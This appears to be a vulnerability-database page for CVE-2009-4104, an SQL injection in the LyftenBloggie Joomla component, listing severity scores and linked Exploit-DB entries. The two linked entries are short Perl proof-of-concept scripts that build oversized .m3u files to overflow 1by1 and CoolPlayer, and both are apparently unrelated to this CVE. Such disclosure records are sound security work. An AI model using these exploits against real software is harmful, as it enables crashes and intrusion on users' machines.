CVE-2009-4104
published 2009-11-29CVE-2009-4104: SQL injection vulnerability in Lyften Designs LyftenBloggie (com_lyftenbloggie) component 1.0.4 for Joomla! allows remote attackers to execute arbitrary SQL…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.10%
79.4th percentile
SQL injection vulnerability in Lyften Designs LyftenBloggie (com_lyftenbloggie) component 1.0.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the author parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lyften | com_lyftenbloggie | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component com_lyftenbloggie 1.04 - SQL Injection
exploitdb·2009-11-28
CVE-2009-4104 Joomla! Component com_lyftenbloggie 1.04 - SQL Injection
Joomla! Component com_lyftenbloggie 1.04 - SQL Injection
---
#############################################################################################
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ##
## Author : kaMtiEz ([email protected]) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
#############################################################################################
[ Software Information ]
[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5. LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL i
Exploit-DB
1by1 1.67 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-20
CVE-2009-4932 1by1 1.67 - '.m3u' Local Stack Overflow (PoC)
1by1 1.67 - '.m3u' Local Stack Overflow (PoC)
---
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
# # 1by1 1.67 (.M3U File) Local Stack Overflow POC # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";
# milw0rm.com [2009-04-20]
Exploit-DB
CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-20
CVE-2009-1437 CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
---
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ##
# # CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";
# milw0rm.com [2009-04-20]
No writeups or analysis indexed.
2009-11-29
Published